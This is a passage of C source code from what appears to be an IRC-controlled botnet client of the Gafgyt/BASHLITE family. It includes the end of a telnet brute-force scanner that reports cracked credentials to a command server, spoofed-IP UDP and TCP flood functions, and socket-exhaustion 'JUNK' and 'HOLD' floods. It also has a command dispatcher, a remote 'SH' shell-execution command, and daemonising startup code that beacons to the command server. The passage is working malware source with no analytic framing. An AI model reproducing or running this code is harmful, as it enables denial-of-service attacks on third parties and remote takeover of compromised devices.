999. if(send(fds[i].fd, "/bin/busybox;echo -e '\\147\\141\\171\\146\\147\\164'\r\n", 49, MSG_NOSIGNAL) < 0) { sclose(fds[i].fd); fds[i].state = 0; fds[i].complete = 1; continue; }
1000. fds[i].state = 103;
1001. }
1002. break;
1003.  
1004. case 103:
1005. {
1006. if(fds[i].totalTimeout == 0) fds[i].totalTimeout = time(NULL);
1007.  
1008. if(readUntil(fds[i].fd, "multi-call", 0, 0, 10000, fds[i].sockbuf, 1024, fds[i].bufUsed))
1009. {
1010. fds[i].totalTimeout = 0;
1011. fds[i].bufUsed = 0;
1012. sockprintf(mainCommSock, "REPORT %s:%s:", inet_ntoa(*(struct in_addr *)&(fds[i].ip)), usernames[fds[i].usernameInd]);
1013. sclose(fds[i].fd);
1014. fds[i].state = 0;
1015. memset(fds[i].sockbuf, 0, 1024);
1016. fds[i].complete = 1;
1017. //fds[i].lastWorked = 1;
1018. continue;
1019. } else {
1020. fds[i].bufUsed = strlen(fds[i].sockbuf);
1021. }
1022.  
1023. if(fds[i].totalTimeout + 30 < time(NULL))
1024. {
1025. sclose(fds[i].fd);
1026. fds[i].state = 0;
1027. fds[i].complete = 1;
1028. }
1029. }
1030. break;
1031.  
1032. }
1033. }
1034. }
1035. }
1036.  
1037.  
1038.  
1039. void sendUDP(unsigned char *target, int port, int timeEnd, int spoofit, int packetsize, int pollinterval)
1040. {
1041. struct sockaddr_in dest_addr;
1042.  
1043. dest_addr.sin_family = AF_INET;
1044. if(port == 0) dest_addr.sin_port = rand_cmwc();
1045. else dest_addr.sin_port = htons(port);
1046. if(getHost(target, &dest_addr.sin_addr)) return;
1047. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1048.  
1049. register unsigned int pollRegister;
1050. pollRegister = pollinterval;
1051.  
1052. if(spoofit == 32)
1053. {
1054. int sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
1055. if(!sockfd)
1056. {
1057. sockprintf(mainCommSock, "Failed opening raw socket.");
1058. return;
1059. }
1060.  
1061. unsigned char *buf = (unsigned char *)malloc(packetsize + 1);
1062. if(buf == NULL) return;
1063. memset(buf, 0, packetsize + 1);
1064. makeRandomStr(buf, packetsize);
1065.  
1066. int end = time(NULL) + timeEnd;
1067. register unsigned int i = 0;
1068. while(1)
1069. {
1070. sendto(sockfd, buf, packetsize, 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1071.  
1072. if(i == pollRegister)
1073. {
1074. if(port == 0) dest_addr.sin_port = rand_cmwc();
1075. if(time(NULL) > end) break;
1076. i = 0;
1077. continue;
1078. }
1079. i++;
1080. }
1081. } else {
1082. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP);
1083. if(!sockfd)
1084. {
1085. sockprintf(mainCommSock, "Failed opening raw socket.");
1086. return;
1087. }
1088.  
1089. int tmp = 1;
1090. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1091. {
1092. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1093. return;
1094. }
1095.  
1096. int counter = 50;
1097. while(counter--)
1098. {
1099. srand(time(NULL) ^ rand_cmwc());
1100. init_rand(rand());
1101. }
1102.  
1103. in_addr_t netmask;
1104.  
1105. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1106. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1107.  
1108. unsigned char packet[sizeof(struct iphdr) + sizeof(struct udphdr) + packetsize];
1109. struct iphdr *iph = (struct iphdr *)packet;
1110. struct udphdr *udph = (void *)iph + sizeof(struct iphdr);
1111.  
1112. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_UDP, sizeof(struct udphdr) + packetsize);
1113.  
1114. udph->len = htons(sizeof(struct udphdr) + packetsize);
1115. udph->source = rand_cmwc();
1116. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1117. udph->check = 0;
1118.  
1119. makeRandomStr((unsigned char*)(((unsigned char *)udph) + sizeof(struct udphdr)), packetsize);
1120.  
1121. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1122.  
1123. int end = time(NULL) + timeEnd;
1124. register unsigned int i = 0;
1125. while(1)
1126. {
1127. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1128.  
1129. udph->source = rand_cmwc();
1130. udph->dest = (port == 0 ? rand_cmwc() : htons(port));
1131. iph->id = rand_cmwc();
1132. iph->saddr = htonl( getRandomIP(netmask) );
1133. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1134.  
1135. if(i == pollRegister)
1136. {
1137. if(time(NULL) > end) break;
1138. i = 0;
1139. continue;
1140. }
1141. i++;
1142. }
1143. }
1144. }
1145.  
1146.  
1147.  
1148. void sendTCP(unsigned char *target, int port, int timeEnd, int spoofit, unsigned char *flags, int packetsize, int pollinterval)
1149. {
1150. register unsigned int pollRegister;
1151. pollRegister = pollinterval;
1152.  
1153. struct sockaddr_in dest_addr;
1154.  
1155. dest_addr.sin_family = AF_INET;
1156. if(port == 0) dest_addr.sin_port = rand_cmwc();
1157. else dest_addr.sin_port = htons(port);
1158. if(getHost(target, &dest_addr.sin_addr)) return;
1159. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1160.  
1161. int sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
1162. if(!sockfd)
1163. {
1164. sockprintf(mainCommSock, "Failed opening raw socket.");
1165. return;
1166. }
1167.  
1168. int tmp = 1;
1169. if(setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &tmp, sizeof (tmp)) < 0)
1170. {
1171. sockprintf(mainCommSock, "Failed setting raw headers mode.");
1172. return;
1173. }
1174.  
1175. in_addr_t netmask;
1176.  
1177. if ( spoofit == 0 ) netmask = ( ~((in_addr_t) -1) );
1178. else netmask = ( ~((1 << (32 - spoofit)) - 1) );
1179.  
1180. unsigned char packet[sizeof(struct iphdr) + sizeof(struct tcphdr) + packetsize];
1181. struct iphdr *iph = (struct iphdr *)packet;
1182. struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
1183.  
1184. makeIPPacket(iph, dest_addr.sin_addr.s_addr, htonl( getRandomIP(netmask) ), IPPROTO_TCP, sizeof(struct tcphdr) + packetsize);
1185.  
1186. tcph->source = rand_cmwc();
1187. tcph->seq = rand_cmwc();
1188. tcph->ack_seq = 0;
1189. tcph->doff = 5;
1190.  
1191. if(!strcmp(flags, "all"))
1192. {
1193. tcph->syn = 1;
1194. tcph->rst = 1;
1195. tcph->fin = 1;
1196. tcph->ack = 1;
1197. tcph->psh = 1;
1198. } else {
1199. unsigned char *pch = strtok(flags, ",");
1200. while(pch)
1201. {
1202. if(!strcmp(pch, "syn"))
1203. {
1204. tcph->syn = 1;
1205. } else if(!strcmp(pch, "rst"))
1206. {
1207. tcph->rst = 1;
1208. } else if(!strcmp(pch, "fin"))
1209. {
1210. tcph->fin = 1;
1211. } else if(!strcmp(pch, "ack"))
1212. {
1213. tcph->ack = 1;
1214. } else if(!strcmp(pch, "psh"))
1215. {
1216. tcph->psh = 1;
1217. } else {
1218. sockprintf(mainCommSock, "Invalid flag \"%s\"", pch);
1219. }
1220. pch = strtok(NULL, ",");
1221. }
1222. }
1223.  
1224. tcph->window = rand_cmwc();
1225. tcph->check = 0;
1226. tcph->urg_ptr = 0;
1227. tcph->dest = (port == 0 ? rand_cmwc() : htons(port));
1228. tcph->check = tcpcsum(iph, tcph);
1229.  
1230. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1231.  
1232. int end = time(NULL) + timeEnd;
1233. register unsigned int i = 0;
1234. while(1)
1235. {
1236. sendto(sockfd, packet, sizeof(packet), 0, (struct sockaddr *)&dest_addr, sizeof(dest_addr));
1237.  
1238. iph->saddr = htonl( getRandomIP(netmask) );
1239. iph->id = rand_cmwc();
1240. tcph->seq = rand_cmwc();
1241. tcph->source = rand_cmwc();
1242. tcph->check = 0;
1243. tcph->check = tcpcsum(iph, tcph);
1244. iph->check = csum ((unsigned short *) packet, iph->tot_len);
1245.  
1246. if(i == pollRegister)
1247. {
1248. if(time(NULL) > end) break;
1249. i = 0;
1250. continue;
1251. }
1252. i++;
1253. }
1254. }
1255.  
1256.  
1257.  
1258. void sendJUNK(unsigned char *ip, int port, int end_time)
1259. {
1260.  
1261. int max = getdtablesize() / 2, i;
1262.  
1263. struct sockaddr_in dest_addr;
1264. dest_addr.sin_family = AF_INET;
1265. dest_addr.sin_port = htons(port);
1266. if(getHost(ip, &dest_addr.sin_addr)) return;
1267. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1268.  
1269. struct state_t
1270. {
1271. int fd;
1272. uint8_t state;
1273. } fds[max];
1274. memset(fds, 0, max * (sizeof(int) + 1));
1275.  
1276. fd_set myset;
1277. struct timeval tv;
1278. socklen_t lon;
1279. int valopt, res;
1280.  
1281. unsigned char *watwat = malloc(1024);
1282. memset(watwat, 0, 1024);
1283.  
1284. int end = time(NULL) + end_time;
1285. while(end > time(NULL))
1286. {
1287. for(i = 0; i < max; i++)
1288. {
1289. switch(fds[i].state)
1290. {
1291. case 0:
1292. {
1293. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1294. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1295. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
1296. else fds[i].state = 1;
1297. }
1298. break;
1299.  
1300. case 1:
1301. {
1302. FD_ZERO(&myset);
1303. FD_SET(fds[i].fd, &myset);
1304. tv.tv_sec = 0;
1305. tv.tv_usec = 10000;
1306. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1307. if(res == 1)
1308. {
1309. lon = sizeof(int);
1310. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1311. if(valopt)
1312. {
1313. close(fds[i].fd);
1314. fds[i].state = 0;
1315. } else {
1316. fds[i].state = 2;
1317. }
1318. } else if(res == -1)
1319. {
1320. close(fds[i].fd);
1321. fds[i].state = 0;
1322. }
1323. }
1324. break;
1325.  
1326. case 2:
1327. {
1328. //nonblocking sweg
1329. makeRandomStr(watwat, 1024);
1330. if(send(fds[i].fd, watwat, 1024, MSG_NOSIGNAL) == -1 && errno != EAGAIN)
1331. {
1332. close(fds[i].fd);
1333. fds[i].state = 0;
1334. }
1335. }
1336. break;
1337. }
1338. }
1339. }
1340. }
1341.  
1342.  
1343.  
1344. void sendHOLD(unsigned char *ip, int port, int end_time)
1345. {
1346.  
1347. int max = getdtablesize() / 2, i;
1348.  
1349. struct sockaddr_in dest_addr;
1350. dest_addr.sin_family = AF_INET;
1351. dest_addr.sin_port = htons(port);
1352. if(getHost(ip, &dest_addr.sin_addr)) return;
1353. memset(dest_addr.sin_zero, '\0', sizeof dest_addr.sin_zero);
1354.  
1355. struct state_t
1356. {
1357. int fd;
1358. uint8_t state;
1359. } fds[max];
1360. memset(fds, 0, max * (sizeof(int) + 1));
1361.  
1362. fd_set myset;
1363. struct timeval tv;
1364. socklen_t lon;
1365. int valopt, res;
1366.  
1367. unsigned char *watwat = malloc(1024);
1368. memset(watwat, 0, 1024);
1369.  
1370. int end = time(NULL) + end_time;
1371. while(end > time(NULL))
1372. {
1373. for(i = 0; i < max; i++)
1374. {
1375. switch(fds[i].state)
1376. {
1377. case 0:
1378. {
1379. fds[i].fd = socket(AF_INET, SOCK_STREAM, 0);
1380. fcntl(fds[i].fd, F_SETFL, fcntl(fds[i].fd, F_GETFL, NULL) | O_NONBLOCK);
1381. if(connect(fds[i].fd, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) != -1 || errno != EINPROGRESS) close(fds[i].fd);
1382. else fds[i].state = 1;
1383. }
1384. break;
1385.  
1386. case 1:
1387. {
1388. FD_ZERO(&myset);
1389. FD_SET(fds[i].fd, &myset);
1390. tv.tv_sec = 0;
1391. tv.tv_usec = 10000;
1392. res = select(fds[i].fd+1, NULL, &myset, NULL, &tv);
1393. if(res == 1)
1394. {
1395. lon = sizeof(int);
1396. getsockopt(fds[i].fd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
1397. if(valopt)
1398. {
1399. close(fds[i].fd);
1400. fds[i].state = 0;
1401. } else {
1402. fds[i].state = 2;
1403. }
1404. } else if(res == -1)
1405. {
1406. close(fds[i].fd);
1407. fds[i].state = 0;
1408. }
1409. }
1410. break;
1411.  
1412. case 2:
1413. {
1414. FD_ZERO(&myset);
1415. FD_SET(fds[i].fd, &myset);
1416. tv.tv_sec = 0;
1417. tv.tv_usec = 10000;
1418. res = select(fds[i].fd+1, NULL, NULL, &myset, &tv);
1419. if(res != 0)
1420. {
1421. close(fds[i].fd);
1422. fds[i].state = 0;
1423. }
1424. }
1425. break;
1426. }
1427. }
1428. }
1429. }
1430.  
1431.  
1432. void processCmd(int argc, unsigned char *argv[])
1433. {
1434. if(!strcmp(argv[0], "PING"))
1435. {
1436. sockprintf(mainCommSock, "PONG!");
1437. return;
1438. }
1439.  
1440. if(!strcmp(argv[0], "GETLOCALIP"))
1441. {
1442. sockprintf(mainCommSock, "My IP: %s", inet_ntoa(ourIP));
1443. return;
1444. }
1445.  
1446. if(!strcmp(argv[0], "SCANNER"))
1447. {
1448. if(argc != 2)
1449. {
1450. sockprintf(mainCommSock, "SCANNER ON | OFF");
1451. return;
1452. }
1453.  
1454. if(!strcmp(argv[1], "OFF"))
1455. {
1456. if(scanPid == 0) return;
1457.  
1458. kill(scanPid, 9);
1459. scanPid = 0;
1460. }
1461.  
1462. if(!strcmp(argv[1], "ON"))
1463. {
1464. if(scanPid != 0) return;
1465. uint32_t parent;
1466. parent = fork();
1467. if (parent > 0) { scanPid = parent; return;}
1468. else if(parent == -1) return;
1469.  
1470. StartTheLelz();
1471. _exit(0);
1472. }
1473. }
1474.  
1475.  
1476. if(!strcmp(argv[0], "HOLD"))
1477. {
1478. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1479. {
1480. sockprintf(mainCommSock, "HOLD <ip> <port> <time>");
1481. return;
1482. }
1483.  
1484. unsigned char *ip = argv[1];
1485. int port = atoi(argv[2]);
1486. int time = atoi(argv[3]);
1487.  
1488. if(strstr(ip, ",") != NULL)
1489. {
1490. sockprintf(mainCommSock, "HOLD Flooding %s:%d for %d seconds.", ip, port, time);
1491. unsigned char *hi = strtok(ip, ",");
1492. while(hi != NULL)
1493. {
1494. if(!listFork())
1495. {
1496. sendHOLD(hi, port, time);
1497. close(mainCommSock);
1498. _exit(0);
1499. }
1500. hi = strtok(NULL, ",");
1501. }
1502. } else {
1503. if (listFork()) { return; }
1504.  
1505. sockprintf(mainCommSock, "HOLD Flooding %s:%d for %d seconds.", ip, port, time);
1506. sendHOLD(ip, port, time);
1507. close(mainCommSock);
1508.  
1509. _exit(0);
1510. }
1511. }
1512.  
1513. if(!strcmp(argv[0], "JUNK"))
1514. {
1515. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1516. {
1517. sockprintf(mainCommSock, "JUNK <ip> <port> <time>");
1518. return;
1519. }
1520.  
1521. unsigned char *ip = argv[1];
1522. int port = atoi(argv[2]);
1523. int time = atoi(argv[3]);
1524.  
1525. if(strstr(ip, ",") != NULL)
1526. {
1527. sockprintf(mainCommSock, "JUNK Flooding %s:%d for %d seconds.", ip, port, time);
1528. unsigned char *hi = strtok(ip, ",");
1529. while(hi != NULL)
1530. {
1531. if(!listFork())
1532. {
1533. sendJUNK(hi, port, time);
1534. close(mainCommSock);
1535. _exit(0);
1536. }
1537. hi = strtok(NULL, ",");
1538. }
1539. } else {
1540. if (listFork()) { return; }
1541.  
1542. sockprintf(mainCommSock, "JUNK Flooding %s:%d for %d seconds.", ip, port, time);
1543. sendJUNK(ip, port, time);
1544. close(mainCommSock);
1545.  
1546. _exit(0);
1547. }
1548. }
1549.  
1550. if(!strcmp(argv[0], "UDP"))
1551. {
1552. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[5]) == -1 || atoi(argv[5]) > 65500 || atoi(argv[4]) > 32 || (argc == 7 && atoi(argv[6]) < 1))
1553. {
1554. sockprintf(mainCommSock, "UDP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <packet size (1 to 65500)> (time poll interval, default 10)");
1555. return;
1556. }
1557.  
1558. unsigned char *ip = argv[1];
1559. int port = atoi(argv[2]);
1560. int time = atoi(argv[3]);
1561. int spoofed = atoi(argv[4]);
1562. int packetsize = atoi(argv[5]);
1563. int pollinterval = (argc == 7 ? atoi(argv[6]) : 10);
1564.  
1565. if(strstr(ip, ",") != NULL)
1566. {
1567. sockprintf(mainCommSock, "UDP Flooding %s for %d seconds.", ip, time);
1568. unsigned char *hi = strtok(ip, ",");
1569. while(hi != NULL)
1570. {
1571. if(!listFork())
1572. {
1573. sendUDP(hi, port, time, spoofed, packetsize, pollinterval);
1574. close(mainCommSock);
1575. _exit(0);
1576. }
1577. hi = strtok(NULL, ",");
1578. }
1579. } else {
1580. if (listFork()) { return; }
1581.  
1582. sockprintf(mainCommSock, "UDP Flooding %s:%d for %d seconds.", ip, port, time);
1583. sendUDP(ip, port, time, spoofed, packetsize, pollinterval);
1584. close(mainCommSock);
1585.  
1586. _exit(0);
1587. }
1588. }
1589.  
1590. if(!strcmp(argv[0], "TCP"))
1591. {
1592. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 32 || (argc > 6 && atoi(argv[6]) < 0) || (argc == 8 && atoi(argv[7]) < 1))
1593. {
1594. sockprintf(mainCommSock, "TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)");
1595. return;
1596. }
1597.  
1598. unsigned char *ip = argv[1];
1599. int port = atoi(argv[2]);
1600. int time = atoi(argv[3]);
1601. int spoofed = atoi(argv[4]);
1602. unsigned char *flags = argv[5];
1603.  
1604. int pollinterval = argc == 8 ? atoi(argv[7]) : 10;
1605. int psize = argc > 6 ? atoi(argv[6]) : 0;
1606.  
1607. if(strstr(ip, ",") != NULL)
1608. {
1609. sockprintf(mainCommSock, "TCP Flooding %s for %d seconds.", ip, time);
1610. unsigned char *hi = strtok(ip, ",");
1611. while(hi != NULL)
1612. {
1613. if(!listFork())
1614. {
1615. sendTCP(hi, port, time, spoofed, flags, psize, pollinterval);
1616. close(mainCommSock);
1617. _exit(0);
1618. }
1619. hi = strtok(NULL, ",");
1620. }
1621. } else {
1622. if (listFork()) { return; }
1623.  
1624. sockprintf(mainCommSock, "TCP Flooding %s for %d seconds.", ip, time);
1625. sendTCP(ip, port, time, spoofed, flags, psize, pollinterval);
1626. close(mainCommSock);
1627.  
1628. _exit(0);
1629. }
1630. }
1631.  
1632. if(!strcmp(argv[0], "KILLATTK"))
1633. {
1634. int killed = 0;
1635. unsigned long i;
1636. for (i = 0; i < numpids; i++) {
1637. if (pids[i] != 0 && pids[i] != getpid()) {
1638. kill(pids[i], 9);
1639. killed++;
1640. }
1641. }
1642.  
1643. if(killed > 0)
1644. {
1645. sockprintf(mainCommSock, "Killed %d.", killed);
1646. } else {
1647. sockprintf(mainCommSock, "None Killed.");
1648. }
1649. }
1650.  
1651. if(!strcmp(argv[0], "LOLNOGTFO"))
1652. {
1653. exit(0);
1654. }
1655. }
1656.  
1657. int initConnection()
1658. {
1659. unsigned char server[512];
1660. memset(server, 0, 512);
1661. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; } //if da sock initialized then close dat
1662. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
1663. else currentServer++;
1664.  
1665. strcpy(server, commServer[currentServer]);
1666. int port = 6667;
1667. if(strchr(server, ':') != NULL)
1668. {
1669. port = atoi(strchr(server, ':') + 1);
1670. *((unsigned char *)(strchr(server, ':'))) = 0x0;
1671. }
1672.  
1673. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
1674.  
1675. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
1676.  
1677. return 0;
1678. }
1679.  
1680. int getOurIP()
1681. {
1682. int sock = socket(AF_INET, SOCK_DGRAM, 0);
1683. if(sock == -1) return 0;
1684.  
1685. struct sockaddr_in serv;
1686. memset(&serv, 0, sizeof(serv));
1687. serv.sin_family = AF_INET;
1688. serv.sin_addr.s_addr = inet_addr("8.8.8.8");
1689. serv.sin_port = htons(53);
1690.  
1691. int err = connect(sock, (const struct sockaddr*) &serv, sizeof(serv));
1692. if(err == -1) return 0;
1693.  
1694. struct sockaddr_in name;
1695. socklen_t namelen = sizeof(name);
1696. err = getsockname(sock, (struct sockaddr*) &name, &namelen);
1697. if(err == -1) return 0;
1698.  
1699. ourIP.s_addr = name.sin_addr.s_addr;
1700.  
1701. int cmdline = open("/proc/net/route", O_RDONLY);
1702. char linebuf[4096];
1703. while(fdgets(linebuf, 4096, cmdline) != NULL)
1704. {
1705. if(strstr(linebuf, "\t00000000\t") != NULL)
1706. {
1707. unsigned char *pos = linebuf;
1708. while(*pos != '\t') pos++;
1709. *pos = 0;
1710. break;
1711. }
1712. memset(linebuf, 0, 4096);
1713. }
1714. close(cmdline);
1715.  
1716. if(*linebuf)
1717. {
1718. int i;
1719. struct ifreq ifr;
1720. strcpy(ifr.ifr_name, linebuf);
1721. ioctl(sock, SIOCGIFHWADDR, &ifr);
1722. for (i=0; i<6; i++) macAddress[i] = ((unsigned char*)ifr.ifr_hwaddr.sa_data)[i];
1723. }
1724.  
1725. close(sock);
1726. }
1727.  
1728.  
1729. int main(int argc, unsigned char *argv[])
1730. {
1731. if(SERVER_LIST_SIZE <= 0) return 0;
1732.  
1733. srand(time(NULL) ^ getpid());
1734. init_rand(time(NULL) ^ getpid());
1735.  
1736. pid_t pid1;
1737. pid_t pid2;
1738. int status;
1739.  
1740. getOurIP();
1741. zprintf("MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", macAddress[0], macAddress[1], macAddress[2], macAddress[3], macAddress[4], macAddress[5]);
1742.  
1743. if (pid1 = fork()) {
1744. waitpid(pid1, &status, 0);
1745. exit(0);
1746. } else if (!pid1) {
1747. if (pid2 = fork()) {
1748. exit(0);
1749. } else if (!pid2) {
1750. } else {
1751. zprintf("fork failed\n");
1752. }
1753. } else {
1754. zprintf("fork failed\n");
1755. }
1756.  
1757. setsid();
1758. chdir("/");
1759.  
1760. signal(SIGPIPE, SIG_IGN);
1761.  
1762. while(1)
1763. {
1764. if(initConnection()) { printf("Failed to connect...\n"); sleep(5); continue; }
1765.  
1766. sockprintf(mainCommSock, "BUILD %s");
1767.  
1768. char commBuf[4096];
1769. int got = 0;
1770. int i = 0;
1771. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1)
1772. {
1773. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
1774. unsigned int *newpids, on;
1775. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
1776. pids[on - 1] = 0;
1777. numpids--;
1778. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
1779. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
1780. free(pids);
1781. pids = newpids;
1782. }
1783.  
1784. commBuf[got] = 0x00;
1785.  
1786. trim(commBuf);
1787.  
1788. if(strstr(commBuf, "PING") == commBuf)
1789. {
1790. sockprintf(mainCommSock, "PONG");
1791. continue;
1792. }
1793.  
1794. if(strstr(commBuf, "DUP") == commBuf) exit(0);
1795.  
1796. unsigned char *message = commBuf;
1797.  
1798. if(*message == '!')
1799. {
1800. unsigned char *nickMask = message + 1;
1801. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
1802. if(*nickMask == 0x00) continue;
1803. *(nickMask) = 0x00;
1804. nickMask = message + 1;
1805.  
1806. message = message + strlen(nickMask) + 2;
1807. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
1808.  
1809. unsigned char *command = message;
1810. while(*message != ' ' && *message != 0x00) message++;
1811. *message = 0x00;
1812. message++;
1813.  
1814. unsigned char *tmpcommand = command;
1815. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
1816.  
1817. if(strcmp(command, "SH") == 0)
1818. {
1819. unsigned char buf[1024];
1820. int command;
1821. if (listFork()) continue;
1822. memset(buf, 0, 1024);
1823. szprintf(buf, "%s 2>&1", message);
1824. command = fdpopen(buf, "r");
1825. while(fdgets(buf, 1024, command) != NULL)
1826. {
1827. trim(buf);
1828. sockprintf(mainCommSock, "%s", buf);
1829. memset(buf, 0, 1024);
1830. sleep(1);
1831. }
1832. fdpclose(command);
1833. exit(0);
1834. }
1835.  
1836. unsigned char *params[10];
1837. int paramsCount = 1;
1838. unsigned char *pch = strtok(message, " ");
1839. params[0] = command;
1840.  
1841. while(pch)
1842. {
1843. if(*pch != '\n')
1844. {
1845. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
1846. memset(params[paramsCount], 0, strlen(pch) + 1);
1847. strcpy(params[paramsCount], pch);
1848. paramsCount++;
1849. }
1850. pch = strtok(NULL, " ");
1851. }
1852.  
1853. processCmd(paramsCount, params);
1854.  
1855. if(paramsCount > 1)
1856. {
1857. int q = 1;
1858. for(q = 1; q < paramsCount; q++)
1859. {
1860. free(params[q]);
1861. }
1862. }
1863. }
1864. }
1865. printf("Link closed by server.\n");
1866. }
1867.  
1868. return 0;
1869.  
1870. }